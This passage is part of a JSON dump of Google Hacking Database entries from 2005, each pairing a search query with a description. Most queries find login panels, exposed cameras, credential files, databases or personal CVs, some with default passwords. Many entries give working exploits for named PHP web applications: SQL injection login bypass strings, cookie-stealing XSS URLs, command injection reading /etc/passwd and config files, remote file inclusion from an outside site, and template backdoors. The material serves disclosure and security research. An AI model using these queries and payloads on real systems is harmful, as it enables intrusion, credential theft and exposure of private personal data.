If you are an administrator then please\"", "long description": "Nothing special, just one more set of login pages, but the \"Administrators only\" line is a classic.", "submited": "2005-07-24", "request": "\"This section is for Administrators only. If you are an administrator then please\"", "id": 1042}, {"short description": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "long description": "Pretty standered login pages, they all have various differences but it appears that they use the same script or software.", "submited": "2005-07-24", "request": "intitle:\"Member Login\" \"NOTE: Your browser must have cookies enabled in order to log into the site.\" ext:php OR ext:cgi", "id": 1043}, {"short description": "site:www.mailinator.com inurl:ShowMail.do", "long description": "Mailinator.com allows people to use temporary email boxes. Read the site, I won't explain here. Anyway, there are emails in this site that have no password protection and potentially contain usernames, passwords, and email data. The only lock against unwanted viewers is the email address which can be randomized.", "submited": "2005-07-24", "request": "site:www.mailinator.com inurl:ShowMail.do", "id": 1044}, {"short description": "filetype:mdb \"standard jet\"", "long description": "These Microsoft Access Database files may contain usernames, passwords or simply prompts for such data.", "submited": "2005-07-26", "request": "filetype:mdb \"standard jet\" (password | username | user | pass)", "id": 1045}, {"short description": "inurl:\"default/login.php\" intitle:\"kerio\"", "long description": "This dork reveals login pages for Kerio Mail server. Kerio MailServer is a state-of-the-art groupware server allowing companies to collaborate via email, shared contacts, shared calendars and tasks. 
Download can be found here http://www.kerio.com/kms_download.html.", "submited": "2005-07-26", "request": "inurl:\"default/login.php\" intitle:\"kerio\"", "id": 1046}, {"short description": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "long description": "Although this search is a bit broken (the file extensions don't always work), it reveals interesting-looking documents which may contain potentially confidential information.", "submited": "2005-07-30", "request": "ext:(doc | pdf | xls | txt | ps | rtf | odt | sxw | psw | ppt | pps | xml) (intext:confidential salary | intext:\"budget approved\") inurl:confidential", "id": 1047}, {"short description": "[WFClient] Password= filetype:ica", "long description": "The WinFrame-Client infos needed by users to connect toCitrix Application Servers (e.g. Metaframe).Often linked/stored on Webservers and sometimes reachable from Internet.Password is 16-byte-Hash of unknown encryption (MSCHAPv2 ?).File Extension is \"ica\" the so called Citrix Independent Computing Architecture.These files may contain login information (Username, Password, Domain).", "submited": "2005-07-27", "request": "[WFClient] Password= filetype:ica", "id": 1048}, {"short description": "intitle:\"V1\" \"welcome to phone settings\" password", "long description": "This is a small search for the Italk BB899 Phone Adaptor login page. iTalkBB is a local and long distance calling service provided by iTalk Broadband Corporation. 
It combines voice and internet networks to provide inbound and outbound long distance and local calling solutions.Depending on the version of firmware preinstalled on your IP Box, the password to get into the setting pages may be either 12345678 or 87654321.", "submited": "2005-08-07", "request": "intitle:\"V1\" \"welcome to phone settings\" password", "id": 1049}, {"short description": "intitle:\"HP ProCurve Switch *\" \"This product requires a frame capable browser.\"", "long description": "HP ProCurve Switch web management pages, found by their [noscript] html tags. Please note: this search only gives results from certain source IP addresses and I can't tell you why (check forum topic number 2609 for details).", "submited": "2005-08-07", "request": "intitle:\"HP ProCurve Switch *\" \"This product requi", "id": 1050}, {"short description": "\"Powered by Gravity Board\"", "long description": "4.22 07/08/2005 Gravity Board X v1.1 (possibly prior versions) Remote code execution, SQL Injection / Login Bypass, cross site scripting, path disclosure poc software: author site: http://www.gravityboardx.com/ a) Sql Injection / Login Bypass: If magic_quotes off, A user can bypass login check and grant administrator privileges on target system: login: ' or isnull(1/0) /* password: whatever b) Cross site scripting poc: b.1)After he login as administrator he can edit template to insert evil javascript code. Try to insert at the end of the template these lines: alert(document.cookie) b.2)A user can craft a malicious url like this to access target user cookies: http://[target]/[path]/deletethread.php?board_id=\">alert(document.cookie) c) Remote commands/php code execution: c.1) Always editing the template, attacker can leave a backdoor in target system, example, at the end of template: After, the attacker can launch commands by this urls: http://[target]/[path]/index.php?cmd=ls%20-la to list directories... 
http://[target]/[path]/index.php?cmd=cat%20/etc/passwd to see Unix /etc/passwd file http://[target]/[path]/index.php?cmd=cat%20config.php to see database username/password c.2) An IMPORTANT NOTE: You can edit template without to be logged in as administator, calling editcss.php script, look at the code of this script: if($fp = fopen('gbxfinal.css','w')){ fwrite($fp, $csscontent); fclose($fp); echo ''; }else{ echo 'Gravity Board X was unable to save changes to the CSS template.'; } you can easily deface the forum and/or insert a backdoor calling an url like this: http://[target]/[path]/editcss.php?csscontent= then execute commands: http://[target]/[path]/index?cmd=[command] It's also possible to disclose path: d) path disclosure: http://[target]/[path]/deletethread.php?perm=1 http://[target]/[path]/ban.php http://[target]/[path]/addnews.php http://[target]/[path]/banned.php http://[target]/[path]/boardstats.php http://[target]/[path]/adminform.php http://[target]/[path]/forms/admininfo.php http://[target]/[path]/forms/announcements.php http://[target]/[path]/forms/banform.php ans so on...calling scripts in /forms directory", "submited": "2005-08-07", "request": "\"Powered by Gravity Board\"", "id": 1051}, {"short description": "\"Powered by SilverNews\"", "long description": "silvernews 2.0.3 (possibly previous versions ) SQL Injection / Login Bypass / Remote commands execution / cross site scripting software: author site: http://www.silver-scripts.de/scripts.php?l=en&script=SilverNews SQL Injection / Login bypass: A user can bypass admin password check, if magic_quotes is set to off: user: ' or isnull(1/0) /* pass: whatever remote commands execution: now, new admin can edit template, clicking on Templates -> Global footer, can add the lines: //*********************************************** TEMPLATE; } } system($HTTP_GET_VARS[command]); /* to leave a backdoor in template file /templates/tpl_global.php now can launch system commands on the target system with theese 
urls: http://[target]/[path]//templates/tpl_global.php?command=ls%20-la to list directories http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/etc/passwd to see /etc/passwd file http://[target]/[path]/templates/TPL_GLOBAL.PHP?command=cat%20/[path_to_config_file]/data.inc.php to see Mysql database password cross site scripting: same way, a user can hide evil javascript code in template", "submited": "2005-08-07", "request": "\"Powered by SilverNews\"", "id": 1052}, {"short description": "PHPFreeNews inurl:Admin.php", "long description": "29/07/2005 8.36.03PHPFreeNews Version 1.32 (& previous) sql injection/login bypass, cross site scripting, path disclosure, information disclosure author site: http://www.phpfreenews.co.uk/Main_Intro.phpxss poc:http://[target]/[path]/inc/Footer.php?ScriptVersion=alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableRatings=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&NewsDir=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?FullNewsDisplayMode=3&PopupHeight=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupWidth=\")}//-->alert(document.cookie)http://[target]/[path]/inc/ScriptFunctions.php?EnableComments=1&PopupHeight=\")}//-->alert(document.cookie)also a user can craft a url to redirect a victim to an evil site:http://[target]/[path]/inc/Logout.php?AdminScript=http://[evil_site]/[evil_script]path 
disclosure:http://[target]/[path]/inc/ArchiveOldNews.phphttp://[target]/[path]/inc/Categories.phphttp://[target]/[path]/inc/CheckLogout.phphttp://[target]/[path]/inc/CommentsApproval.phphttp://[target]/[path]/inc/Images.phphttp://[target]/[path]/inc/NewsList.phphttp://[target]/[path]/inc/Password.phphttp://[target]/[path]/inc/Post.phphttp://[target]/[path]/inc/PostsApproval.phphttp://[target]/[path]/inc/PurgeOldNews.phphttp://[target]/[path]/inc/SetSticky.phphttp://[target]/[path]/inc/SetVisible.phphttp://[target]/[path]/inc/Statistics.phphttp://[target]/[path]/inc/Template.phphttp://[target]/[path]/inc/UserDefinedCodes.phphttp://[target]/[path]/inc/Users.phpinformation disclosure:googledork:PHPFreeNews inurl:Admin.php(with this, you can passively fingerprint the server, PHP & MySQL version are in Google description...because this info are shownwed with non-chalance in admin.php page ;) )default password:login: Adminpass: AdminMySQL Injection / Login Bypass in previous versions:login: Adminpassword: ') or isnull(1/0) or ('a'='anote: all string, not consider 'or'in 1.32 version LoginUsername and LoginPassword vars are addslashed... but, try this: login: whateverpass: //') or isnull(1/0) /* this is definetely patched in 1.40 version", "submited": "2005-08-07", "request": "PHPFreeNews inurl:Admin.php", "id": 1053}, {"short description": "inurl:nquser.php filetype:php", "long description": "Netquery 3.1 remote commands execution, cross site scripting, information disclosure poc exploit software: author site: http://www.virtech.org/tools/ a user can execute command on target system by PING panel, if enabled like often happens, using pipe char on input text \"Ping IP Address or Host Name\", example: | cat /etc/passwd then you will see plain text password file | pwd to see current path | rm [pwd_output]/logs/nq_log.txt to delete log file... 
disclosure of user activity: if enabled, a user can view clear text log file through url: http://[target]/[path]/logs/nq_log.txt xss: http://[target]/[path]/submit.php?portnum=\"/>alert(document.cookie) http://[target]/[path]/nqgeoip2.php?step=alert(document.cookie) http://[target]/[path]/nqgeoip2.php?body=alert(document.cookie) http://[target]/[path]/nqgeoip.php?step=alert(document.cookie) http://[target]/[path]/nqports.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?step=alert(document.cookie) http://[target]/[path]/nqports2.php?body=alert(document.cookie) http://[target]/[path]/portlist.php?portnum=alert(document.cookie) a user can use on-line Netquery installations like proxy servers to launch exploit from HTTP GET request panel, example: exploiting Phpbb 2.0.15: make a get request of http://[vulnerable_server]/[path]/viewtopic.php?t=[existing_topic]&highlight='.system($HTTP_GET_VARS[command].'&command=cat%20/etc/passwd", "submited": "2005-08-07", "request": "inurl:nquser.php filetype:php", "id": 1054}, {"short description": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "long description": "26/07/2005 16.09.18Simplicity OF Upload 1.3 (possibly prior versons) remote code execution & cross site scriptingsoftware: author site: http://www.phpsimplicity.com/scripts.php?id=3remote commands execution:problem at line 25-30: ...//check for language overriding..if (isset($_GET['language'])) $language = strtolower($_GET['language']);//now we include the language filerequire_once(\"$language.lng\");...you can include whatever adding a null byte to \"language\" parameter value:example:http://localhost:30/simply/download.php?language=upload.php%00you will see upload & download page together :)so you can upload a cmd.gif (when you upload a .php file, usually it isrenamed to .html...) 
file with this php code inside to executecommands:then try this url:http://[target]/[path]/download.php?language=cmd.gif%00&command=lsto list directorieshttp://[target]/[path]/download.php?language=cmd.gif%00&command=cat%20/etc/passwdto show /etc/passwd filecross site scripting:also, a remote user can supply a specially crafted URL to redirect other peopleto an evil page:http://[target]/[path]/download.php?language=http://[evil_site]/[evil_page]%00googledork:\"Powered By: Simplicity oF Upload\"", "submited": "2005-08-07", "request": "\"Powered By: Simplicity oF Upload\" inurl:download.php | inurl:upload.php", "id": 1055}, {"short description": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "long description": "24/07/2005 2.38.13Flex PHPNews 0.0.4 login bypass/ sql injection, cross site scripting & resource consumption poc exploitsoftware:author site:http://www.china-on-site.com/flexphpnews/downloads.phpxss / cookie disclosure:http://[target]/[path]/index.php?front_indextitle=alert(document.cookie)http://[target]/[path]/index.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/index.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/news.php?newsid=\">alert(document.cookie)http://[target]/[path]/news.php?front_rating=\">alert(document.cookie)http://[target]/[path]/news.php?salt=\">alert(document.cookie)http://[target]/[path]/news.php?front_letmerateit=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratebest=\">alert(document.cookie)http://[target]/[path]/news.php?front_ratesubmit=\">alert(document.cookie)http://[target]/[path]/news.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/search.php?front_searchresult=alert(document.cookie)http://[target]/[path]/search.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_searchsubmit=\">alert(document.cookie)http://[target]/[path]/catalog.php?front_latestnews=\">alert(document.cookie)http://[target]/[path]/cat
alog.php?catalogid=\">alert(document.cookie)path disclosure:http://[target]/[path]/admin/usercheck.php?logincheck=%00denial of service / resources consumption:http://[target]/[path]/news.php?prenumber=99999999999999999999999999999999http://[target]/[path]/news.php?nextnumber=99999999999999999999999999999999($prenumber and $nextnumber are uninitialized final values of a loop...) sql injection / bypass authentication:go to login page:http://[target]/[path]/admin/(usually admin if not changed)login as user: ' OR 'a'='aand pass : ' OR 'a'='a boom! you're admin ...the problem is in usercheck.php at line 5:$sql = \"select username from newsadmin where username='$checkuser' and password='$checkpass'\";you can post always true statements, like 'a'='a'solution: replace $checkuser and $checkpass vars with your username and pass, by the moment", "submited": "2005-08-07", "request": "\"Powered by FlexPHPNews\" inurl:news | inurl:press", "id": 1056}, {"short description": "\"Powered by FunkBoard\"", "long description": "FunkBoard V0.66CF (possibly prior versions) cross site scripting, possible database username/password disclosure & board takeover, possible remote code execution software: author site: http://www.[path_to_funkboard].co.uk/ xss: http://[target]/[path_to_funkboard]/editpost.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/editpost.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/prefs.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/newtopic.php?forumid=1&subject=\">alert(document.cookie) http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbusername=\">alert(document.cookie) 
http://[target]/[path_to_funkboard]/reply.php?forumid=1&threadid=1&fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/profile.php?fbpassword=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fbusername=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?fmail=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?www=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?icq=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?yim=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?location=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sex=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?interebbies=\">alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?sig=alert(document.cookie) http://[target]/[path_to_funkboard]/register.php?aim=\">alert(document.cookie) path disclosure: http://[target]/[path_to_funkboard]/images/forums.php database username & password disclosure: during installation is not remembered to delete the mysql_install script and the installation do not delete it, usually: http://[target]/[path]/admin/mysql_install.php or http://[target]/[path]/admin/pg_install.php there, a user can see database clear text username & password ... Then, the script let the user proceed to the next page, where he can reset funkboard administator username & password. Now the script faults, because some tables exist, etc. So user can go back and setting a new database name for installation, guessing among other installations on the server... Once Installation succeeded he can set new admin username e password then login at this page: http://[target]/[path]/[path_to_funkboard]/admin/index.php Now the user can edit templates and append some evil javascript code. 
remote code execution: look at this code in mysql_install.php : $infoout = \" so, you have a backdoor on target system... you can launch commands by this urls: http://localhost:30/funkboard/info.php?command=ls%20-la to list directories... http://localhost:30/funkboard/info.php?command=cat%20/etc/passwd to see /etc/passwd file", "submited": "2005-08-08", "request": "\"Powered by FunkBoard\"", "id": 1057}, {"short description": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"cameraProbe 3.0\" -filetype:pdf -filetype:html", "long description": "sensorProbe is a SNMP enabled and Web based Environmental Monitoring Device. The sensors attached to this device can monitor temperature, humidity, water leakage and air flow, etc. It does support other sensors which can monitor voltage drop, security, analog and dry contacts. The sensorProbe monitors your equipment's environmental variations, and alerts you through \"Email , SMS or SNMP Alerts in your Network Management system\" in advance and prevent any disaster.", "submited": "2005-08-07", "request": "\"Summary View of Sensors\" | \"sensorProbe8 v *\" | \"", "id": 1058}, {"short description": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "long description": "[quote]Cisco CallManagerCallManager is a FREE web application/interface included with your VoIP telephone service. 
It allows you to change and update settings on your phone without having to contact the Telecommunications Help Desk.Voice over IP telephone users Logon to Cisco CallManager at: http://XXXXXX/ccmuser/logon.asp* User ID your UWYO Domain username* Password initial password is 12341234Please create your own unique password after your initial logon[/quote]There are several vulnerbilities for CallManager", "submited": "2005-08-08", "request": "intitle:\"Cisco CallManager User Options Log On\" \"Please enter your User ID and Password in the spaces provided below and click the Log On button to co", "id": 1059}, {"short description": "inurl:index.php fees shop link.codes merchantAccount", "long description": "Vulnerability in EPay systemsPHP code includinghttp://targeturl/index.php?read=../../../../../../../../../../../../../../etc/passwdadvisory:http://www.cyberlords.net/advisories/cl_epay.txtEPay Pro version 2.0 is vulnerable to this issue.", "submited": "2005-08-10", "request": "inurl:index.php fees shop link.codes merchantAccount", "id": 1060}, {"short description": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "long description": "This finds all versions of RedKernel Referer Tracker(stats page) it just gives out some nice info", "submited": "2005-08-16", "request": "intitle:\"admin panel\" +\"Powered by RedKernel\"", "id": 1061}, {"short description": "intitle:phpnews.login", "long description": "Vulnerable script auth.php (SQL injection)--- from rst.void.ru ---Possible scenario of attack:[1] log in admin panel, using SQL injection[2] upload PHP file through \"Upload Images\" function (index.php?action=images) and have fun with php shellor edit template (index.php?action=modtemp) and put backdoor code into it.-------------------------http://www.securityfocus.com/bid/14333/infohttp://rst.void.ru/papers/advisory31.txtThe version number may be found sometimes in error messages.", "submited": "2005-08-10", "request": "intitle:phpnews.login", "id": 1062}, {"short 
description": "intitle:\"blog torrent upload\"", "long description": "Blog Torrent is free, open-source software that provides a way to share large files on your website.vulnerability: free access to the password filehttp://[target]/[path_of_blog]/data/newusersadvisory:http://www.securitytracker.com/alerts/2005/Jul/1014449.htmlAll current versions could be vulnerable depending on directory permissions.", "submited": "2005-08-10", "request": "intitle:\"blog torrent upload\"", "id": 1063}, {"short description": "intitle:MyShell 1.1.0 build 20010923", "long description": "Basicly MyShell is a php program that allows you to execute commands remotely on whichever server it's hosted on.", "submited": "2005-08-15", "request": "intitle:MyShell 1.1.0 build 20010923", "id": 1064}, {"short description": "intitle:\"Network Storage Link for USB 2.0 Disks\" Firmware", "long description": "Networked USB hard drives (NSLU2). Be sure to disable Google's filter (&filters=0) as that is where they pop up. Default password (Linksys) is admin:admin (just like all the rest). A majority are locked some are not. Some logins to the NSLU2 will be a link off a website. Enjoy.", "submited": "2005-08-12", "request": "http://www.google.com/search?q=intitle:%22Network+Storage+Link+for+USB+2.0+Disks%22+Firmware&num=100&hl=en&lr=&c2coff=1&safe=off&filter=0", "id": 1065}, {"short description": "intitle:\"AlternC Desktop\"", "long description": "This finds the login page for AlternC Desktop I dont know what versions.", "submited": "2005-08-15", "request": "intitle:\"AlternC Desktop\"", "id": 1066}, {"short description": "intitle:\"communigate pro * *\" intitle:\"entrance\"", "long description": "Just reveals the login for Communigate Pro webmail. A brute force attack could be attempted. 
The directory link from this page can in some instances be used to query user information.", "submited": "2005-08-11", "request": "intitle:communigate pro entrance", "id": 1067}, {"short description": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "long description": "This finds all versions of the inspanel login page.", "submited": "2005-08-15", "request": "\"inspanel\" intitle:\"login\" -\"cannot\" \"Login ID\" -site:inspediumsoft.com", "id": 1068}, {"short description": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "long description": "Online camera. Default login is administrator and password blank. Video server runs default on port 2000. There is an application DVR Center that is used to connect to server and manage recorded videos.", "submited": "2005-08-17", "request": "intitle:iDVR -intitle:\"com | net | shop\" -inurl:\"asp | htm | pdf | html | php | shtml | com | at | cgi | tv\"", "id": 1069}, {"short description": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "long description": "This will find the login portal for HostingAccelerator ControlPanel I have not looked for exploits for these so i dont know if their are any. So far i have seen versions 1.9 2.2 and 2.4 found by this dork.", "submited": "2005-08-14", "request": "\"HostingAccelerator\" intitle:\"login\" +\"Username\" -\"news\" -demo", "id": 1070}, {"short description": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "long description": "This googledork finds INTELLINET ip cameras. They are used to monitor things and have a web interface. Most of the pages load with the default username and password of guest. The user manual says that the default admin username/password is admin/admin. At the time of posting this googledork had 10 results. p.s. 
This was discovered by jeffball55 and cleaned up by golfo", "submited": "2005-08-27", "request": "intitle:\"INTELLINET\" intitle:\"IP Camera Homepage\"", "id": 1071}, {"short description": "\"Powered by Zorum 3.5\"", "long description": "Zorum 3.5 remote code execution poc exploitsoftware:description: Zorum is a freely available, open source Web-based forumapplication implemented in PHP. It is available for UNIX, Linux, and any otherplatform that supports PHP script execution.author site: http://zorum.phpoutsourcing.com/1) remote code execution:vulnerable code, in /gorum/prod.php file:07 $doubleApp = isset($argv[1]); ...14 if( $doubleApp )15 {16 $appDir = $argv[1];17 system(\"mkdir $prodDir/$appDir\"); ...a user can execute arbitrary commands using pipe char, example:http://[target]/zorum/gorum/prod.php?argv[1]=|ls%20-lato list directorieshttp://[target]/zorum/gorum/prod.php?argv[1]=|cat%20../config.phpto see database username/password...http://[target]/zorum/gorum/prod.php?argv[1]=|cat%20/etc/passwdto see /etc/passwd file2) path disclosure:http://[target]/zorum/gorum/notification.phphttp://[target]/zorum/user.phphttp://[target]/zorum/attach.phphttp://[target]/zorum/blacklist.phphttp://[target]/zorum/forum.phphttp://[target]/zorum/globalstat.phphttp://[target]/zorum/gorum/trace.phphttp://[target]/zorum/gorum/badwords.phphttp://[target]/zorum/gorum/flood.phpand so on...googledork:\"Powered by Zorum 3.5\"rgodsite: http://rgod.altervista.orgmail: retrogod at aliceposta itoriginal advisory: http://rgod.altervista.org/zorum.html", "submited": "2005-08-18", "request": "\"Powered by Zorum 3.5\"", "id": 1072}, {"short description": "intitle:\"xams 0.0.0..15 - Login\"", "long description": "This is the login for xams it should catch from 0.0.1-0.0.150.0.15 being the latest version as far as I can see their is only versions 0.0.13 0.0.14 and 0.0.15", "submited": "2005-08-14", "request": "intitle:\"xams 0.0.0..15 - Login\"", "id": 1073}, {"short description": 
"intitle:\"curriculum vitae\" filetype:doc", "long description": "Hello. 1. It reveals personal datas, often private addresses, phone numbers, e-mails, how many children one has:). Full curriculum vitae. I tried many verions of it:inurl:\"pl\" intitle:\"curriculum vitae\" filetype:docinurl:\"uk\" intitle:\"curriculum vitae\" filetype:docinurl:\"nl\" intitle:\"curriculum vitae\" filetype:doc, etc. in order to get national results,alsointitle:\"curriculum vitae\" ext:(doc | rtf )However filetype:doc version gives the most results. 2. You can always do someting with someone phone number, date and place of birth, etc. I placed this string in the forum, but nobody answered me :(. GreetingsphilYps. you have something similar in your GHDB, but different.\"Click here for the Google search ==> \"phone * * *\" \"address *\" \"e-mail\" intitle:\"curriculum vitae\"(opens in new window)Added: Thursday, August 19, 2004hits: 24771\"", "submited": "2005-08-12", "request": "intitle:\"curriculum vitae\" filetype:doc", "id": 1074}, {"short description": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "long description": "search reveals database errors on vbulletin sites. 
View the page source and you can get information about the sql query executed, this can help in all manner of ways depending on the query.", "submited": "2005-08-16", "request": "\"There seems to have been a problem with the\" \" Please try again by clicking the Refresh button in your web browser.\"", "id": 1075}, {"short description": "inurl:csCreatePro.cgi", "long description": "Create Pro logon pages.", "submited": "2005-08-28", "request": "inurl:csCreatePro.cgi", "id": 1076}, {"short description": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "long description": "FUDforum is prone to a remote arbitrary PHP file upload vulnerability.An attacker can merge an image file with a script file and upload it to an affected server.This issue can facilitate unauthorized remote access.FUDforum versions prior to 2.7.1 are reported to be affected. Currently Symantec cannot confirm if version 2.7.1 is affected as well.Affected versions:2.6.15 _ 2.6.14 _ 2.6.132.6.12 _ 2.6.10 _ 2.6.9 _ 2.6.82.6.7 _ 2.6.5 _ 2.6.4 _ 2.6.32.6.2 _ 2.6.1 _ 2.6", "submited": "2005-08-30", "request": "\"Powered by FUDForum 2.6\" -site:fudforum.org -johnny.ihackstuff", "id": 1077}, {"short description": "intitle:\"Looking Glass v20040427\" \"When verifying an URL check one of those\"", "long description": "Looking Glass v20040427 arbitrary commands execution / cross site scripting. description: Looking Glass is a pretty extensive web based network querying tool for use on php enabled servers. site: http://de-neef.net/articles.php?id=2&page=1download page: http://de-neef.net/download.php?file=2Read the full report here: http://rgod.altervista.org/lookingglass.html", "submited": "2005-09-19", "request": "intitle:\"Looking Glass v20040427\" \"When verifying", "id": 1078}, {"short description": "contacts ext:wml", "long description": "Forget Bluetooth Hacking! You'll be amazed, at how many people sync their Cell Phones to the same Computers they run some type of Server on. 
This Query literally gives you access to peoples private contact lists that are ether on there Smart Phones', or on their Windows CE wireless devices.An attacker could Spoof Emails with the \"SIG\" details of the persons Phone firmware, or simply collect the cellular numbers for something later on down the road.I even hypotheticlly came across some private text messages!", "submited": "2005-08-23", "request": "contacts ext:wml", "id": 1079}, {"short description": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "long description": "This is a googledork for StarDot netcams. You can watch these cams and if you have the admin password you can change configurations and other settings. They have a default admin name/pass but I haven't taken the time to figure it out.", "submited": "2005-09-06", "request": "intitle:\"NetCam Live Image\" -.edu -.gov -johnny.ihackstuff.com", "id": 1080}, {"short description": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "long description": "iCMS - Content Management System...Create websites without knowing HTML or web programming.", "submited": "2005-08-30", "request": "intitle:\"Content Management System\" \"user name\"|\"password\"|\"admin\" \"Microsoft IE 5.5\" -mambo -johnny.ihackstuff", "id": 1081}, {"short description": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "long description": "phpLDAPadmin 0.9.6 - 0.9.7/alpha5 (possibly prior versions) system disclosure,remote code execution, cross site scriptingsoftware:author site: http://phpldapadmin.sourceforge.net/description: phpLDAPadmin is a web-based LDAP client. It provides easy,anywhere-accessible, multi-language administration for your LDAP serverIf unpatched and vulnerable, a user can see any file on target system. 
A user can also execute arbitrary php code and system commands or craft a malicious url to include malicious client side code that will be executed in the security contest of the victim browser.", "submited": "2005-08-29", "request": "phpLDAPadmin intitle:phpLDAPadmin filetype:php inurl:tree.php | inurl:login.php | inurl:donate.php (0.9.6 | 0.9.7)", "id": 1082}, {"short description": "\"powered by ITWorking\"", "long description": "saveWebPortal 3.4 remote code execution / admin check bypass / remote fileinclusion / cross site scripting author site: http://www.circeos.itdownload page: http://www.circeos.it/frontend/index.php?page=downloadsa) remote code execution:a user can bypass admin check, calling this url:http://[target]/saveweb/admin/PhpMyExplorer/editerfichier.php?chemin=.&fichier=header.php&type=Sourcenow can leave a backdoor in header.php or some other file, example:after editing template, user can execute arbitrary system commands, through aurl like this:http://[target]/saveweb/header.php?command=ls%20-lato list directories...http://[target]/saveweb/header.php?command=cat%20config.inc.phpto see database username/password and admin panel username/password (now attacker have full access to site configuration... 
can go tohttp://[target]/saveweb/admin/to login...)http://[target]/saveweb/header.php?command=cat%20/etc/passwdto see passwd file...b) arbitrary file inclusion:a user can view any file on the target server,if not with .php extension:http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../boot.ini%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../boot.ini%00can execute arbitrary file resident on target server, if with .php extension,example :http://[target]/saveweb/menu_dx.php?SITE_Path=../../../../../[script].php%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=../../../../../[script].php%00can craft a malicious url to cause victim user to execute commands on externalsite:http://[target]/saveweb/menu_dx.php?SITE_Path=http://[external_site]/cmd.gif%00http://[target]/saveweb/menu_sx.php?CONTENTS_Dir=http://[external_site]/cmd.gif%00where cmd.gif is a file like this:c) xss:c.1)http://[target]/saveweb/footer.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author_Domain=>alert(document.cookie)http://[target]/saveweb/footer.php?SITE_Author=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Info=>alert(document.cookie)http://[target]/saveweb/footer.php?L_Help=>alert(document.cookie)http://[target]/saveweb/header.php?TABLE_Width=>alert(document.cookie)http://[target]/saveweb/header.php?L_Visitors=>alert(document.cookie)http://[target]/saveweb/header.php?count=>alert(document.cookie)http://[target]/saveweb/header.php?SITE_Logo=\">alert(document.cookie)http://[target]/saveweb/header.php?BANNER_Url=\">alert(document.cookie)http://[target]/saveweb/header.php?L_Sunday=\"}alert(document.cookie)", "submited": "2005-08-21", "request": "\"powered by ITWorking\"", "id": 1083}, {"short description": "intitle:guestbook inurl:guestbook \"powered by Advanced guestbook 2.*\" \"Sign the Guestbook\"", "long description": "Advanced Guestbook is prone to an HTML injection vulnerability. 
